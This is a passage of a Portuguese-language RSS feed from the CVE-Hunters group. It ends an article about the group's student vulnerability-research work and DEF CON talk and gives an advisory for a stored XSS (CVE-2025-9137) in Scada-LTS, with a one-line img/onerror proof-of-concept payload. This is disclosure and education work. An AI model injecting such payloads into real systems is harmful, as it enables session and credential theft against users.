a experiência adquirida foi reconhecida pelo mercado. Simultaneamente, os desenvolvedores do &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;WeGIA&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; não apenas corrigiram as vulnerabilidades descobertas, como também implementaram as &amp;lt;b&amp;gt;melhores práticas de segurança&amp;lt;/b&amp;gt; em todo o projeto. O que começou como uma colaboração pontual evoluiu para um relacionamento duradouro, com outros pesquisadores independentes se sentindo inspirados a contribuir para o projeto.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;2ª-onda--projetos-portabilis&amp;#34;&amp;gt;2ª Onda – Projetos Portabilis
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A validação inicial abriu caminho para uma expansão ambiciosa. Com 10 novos alunos, a equipe identificou seu próximo desafio: &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://portabilis.com.br/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;#Portabilis&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;, uma empresa que desenvolve softwares de código aberto para gestão educacional.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;&amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/portabilis/i-educar&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;i-Educar&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; representa uma história impressionante em termos de alcance social:&amp;lt;/p&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;O sistema conecta mais de 80 municípios brasileiros;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Gerencia 2.050 escolas;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Impacta 500.000 alunos.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;Até mesmo a Força Aérea Brasileira o utiliza para simulações críticas.&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A descoberta da &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8789&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-2025-8789&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; ilustra como vulnerabilidades simples podem ter consequências devastadoras.&amp;lt;/br&amp;gt;Essa falha permitiu que &amp;lt;b&amp;gt;usuários sem privilégios alterassem as notas dos alunos&amp;lt;/b&amp;gt; por meio de chamadas diretas à API. A ironia era cruel: enquanto a interface bloqueava ações não autorizadas, as APIs operavam como portas abertas, validando apenas se o usuário estava logado, ignorando suas permissões específicas. O processo revelou a metodologia sistemática desenvolvida: análise de fluxos limitados, interceptação de solicitações, testes de bypass e confirmação da verdadeira gravidade.&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Os resultados da 2ª Onda refletem escala e profundidade:&amp;lt;/p&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;42 vulnerabilidades no &amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/portabilis/i-educar&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;i-Educar&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;19 no &amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/portabilis/i-diario&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;i-Diário&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;8 CVEs publicados;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;53 vulnerabilidades no processo de divulgação.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;h2 id=&amp;#34;3ª-onda--diversificação-e-maturidade&amp;#34;&amp;gt;3ª Onda – Diversificação e Maturidade
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;A 3ª Onda marca uma maturidade notável, gerenciando &amp;lt;b&amp;gt;oito projetos simultâneos&amp;lt;/b&amp;gt;, desde a continuidade com &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/LabRedesCefetRJ/WeGIA&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;WeGIA&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; e &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/portabilis/i-educar&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;i-Educar&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; até a diversificação para &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/centreon/centreon&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Centreon&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;, &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/getgrav/grav&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Grav&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;, &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/indico/indico&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Indico&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; e &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/SCADA-LTS/Scada-LTS&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Scada-LTS&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;. Entre todas as descobertas, o trabalho no &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://github.com/SCADA-LTS/Scada-LTS&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Scada-LTS&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; se destaca como um momento quase cinematográfico. Este sistema, usado pela &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.itaipu.gov.br/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;Usina de Itaipu&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; para simular ataques cibernéticos à infraestrutura crítica, revelou duas vulnerabilidades XSS (&amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7728&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-2025-7728&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; e &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-7729&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-2025-7729&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt;) em &amp;lt;b&amp;gt;menos de um minuto&amp;lt;/b&amp;gt;, demonstrando a eficiência refinada da metodologia.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;metodologia-estruturada&amp;#34;&amp;gt;Metodologia Estruturada
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O processo inclui:&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Seleção criteriosa (1 a 2 dias) avaliando o impacto social e a capacidade de resposta do mantenedor;&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;Reconhecimento aprofundado (3 a 5 dias) mapeando a arquitetura e configurando ambientes;&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;Avaliação intensiva de vulnerabilidades (15 a 20 dias) combinando análise estática com testes dinâmicos;&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;Desenvolvimento de PoC (2 a 3 dias);&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;Divulgação responsável (5 a 10 dias), envolvendo diplomacia cuidadosa.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O kit de ferramentas evoluiu organicamente: SonarQube e Semgrep para análise estática, Burp Suite e OWASP ZAP para testes dinâmicos e scripts Python personalizados para lacunas específicas. Relatórios via VulnDB, Alertas de Segurança do GitHub e modelos padronizados garantiram consistência e aumentaram as taxas de aceitação.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Cada onda trouxe desafios únicos. A diversidade tecnológica exigiu expertise especializada em tempo recorde. Os desafios interpessoais, a falta de cooperação entre mantenedores, os tempos de resposta variáveis e os diferentes níveis de maturidade em segurança ensinaram paciência estratégica e gestão de stakeholders. Duas lições se mostraram fundamentais:&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;&amp;lt;ul&amp;gt;&amp;lt;li&amp;gt;Documentação detalhada com capturas de tela e uma articulação clara da relevância para o negócio;&amp;lt;/li&amp;gt;&amp;lt;li&amp;gt;A colaboração amplifica exponencialmente os resultados por meio de revisão por pares e mentoria.&amp;lt;/li&amp;gt;&amp;lt;/ul&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;legado-educacional-e-comunitário&amp;#34;&amp;gt;Legado Educacional e Comunitário
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O legado educacional desenvolveu habilidades técnicas impressionantes, análise sistemática de código, compreensão intuitiva de superfícies de ataque, desenvolvimento de PoCs funcionais e habilidades profissionais, como gerenciamento de múltiplos projetos, relacionamento com stakeholders e documentação profissional. Os resultados validaram a hipótese original: vários membros conseguiram seus primeiros empregos com portfólios demonstráveis e reconhecimento da comunidade por meio de CVEs públicos. A contribuição para a comunidade foi além da correção de vulnerabilidades, estabelecendo práticas de segurança em projetos que antes as ignoravam, inspirando grupos semelhantes e demonstrando a viabilidade de modelos colaborativos.
&amp;lt;h2 id=&amp;#34;o-futuro-dos-cve-hunters&amp;#34;&amp;gt;O Futuro dos CVE-Hunters
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O futuro inclui:&amp;lt;/p&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Expansão por meio de parcerias com Universidades;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Um programa formal de mentoria;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;O desenvolvimento de ferramentas proprietárias.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Para aspirantes a pesquisadores de segurança, as lições são claras:&amp;lt;/p&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;Foco inicial em um único projeto com impacto mensurável;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Dedicação de tempo suficiente, documentação meticulosa;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Compromisso inabalável com a divulgação responsável.&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Os educadores podem revolucionar o ensino substituindo simulações pelo engajamento com projetos reais. A comunidade de código aberto pode melhorar os resultados estabelecendo canais de relatórios claros e promovendo uma cultura de segurança em primeiro lugar.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;conclusão&amp;#34;&amp;gt;Conclusão
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O projeto &amp;lt;b&amp;gt;&amp;lt;a href=&amp;#34;https://www.cvehunters.com/&amp;#34; target=&amp;#34;_blank&amp;#34;&amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/b&amp;gt; democratizou o acesso à expertise em segurança do mundo real, criando um caminho replicável para &amp;lt;b&amp;gt;qualquer pessoa&amp;lt;/b&amp;gt; que queira fazer a diferença.&amp;lt;/br&amp;gt;&amp;lt;/br&amp;gt;Os números:&amp;lt;/p&amp;gt;
&amp;lt;ul&amp;gt;
&amp;lt;li&amp;gt;116 CVEs publicados;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;20 membros ativos;&amp;lt;/li&amp;gt;
&amp;lt;li&amp;gt;Milhões de usuários impactados!&amp;lt;/li&amp;gt;
&amp;lt;/ul&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Quantifique o sucesso, mas o efeito qualitativo é mais significativo:&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Você não precisa esperar por oportunidades quando pode criar as suas.&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;p style=&amp;#34;text-align: center;&amp;#34;&amp;gt;&amp;#34;Não estávamos apenas procurando bugs, estávamos procurando uma maneira de contribuir.&amp;#34;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;E eles contribuíram profundamente para seus próprios futuros, para a segurança de sistemas que protegem populações vulneráveis e para a próxima geração de pesquisadores de segurança, munidos de um roteiro testado e comprovado para transformar a curiosidade em carreira.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Apresentação &amp;#34;From Noobz to Vulnerability Researchers: The Journey of the CVE-Hunters&amp;#34; - DEF CON 33, 2025.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;autor-da-apresentação&amp;#34;&amp;gt;Autor da Apresentação
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/natan50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/nmmorette&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Natan Maia Morette&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;artigo-escrito-por&amp;#34;&amp;gt;Artigo escrito por
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/elisangela50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/elisangelasilvademendonca/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Elisangela Mendonça&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;colaboradora&amp;#34;&amp;gt;Colaboradora
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;Por: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/Sec-Dojo-Cyber-House/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Wed, 20 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9137</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9137/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9137/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9137-cross-site-scripting-xss-armazenado-no-endpoint-publisher_editshtm-parâmetro-alias&amp;#34;&amp;gt;CVE-2025-9137: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9137&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9137&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-9137-cross-site-scripting-xss-armazenado-no-endpoint-publisher_editshtm-parâmetro-alias&amp;#34;&amp;gt;CVE-2025-9137: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-9137&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-9137&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt; do aplicativo Scada-LTS. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;publisher_edit.shtm&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;alias&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(1)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-9137/image.png&amp;#34;
	width=&amp;#34;775&amp;#34;
	height=&amp;#34;485&amp;#34;
	srcset=&amp;#34;/p/cve-2025-9137/image_hu_5233a8cd4b2f18d9.png 480w, /p/cve-2025-9137/image_hu_94453de285483063.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;159&amp;#34;
		data-flex-basis=&amp;#34;383px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9137.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/KarinaGante/KG-Sec/blob/main/CVEs/Scada-LTS/CVE-2025-9137.md&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 19 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-9138</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-9138/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-9138/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-9138-cross-site-scripting-xss-armazenado-no-endpoint-pointhierarchynew-via-path-parameter&amp;#34;&amp;gt;CVE-2025-9138: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;pointHierarchy/new/&amp;lt;/code&amp;gt; via path parameter
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
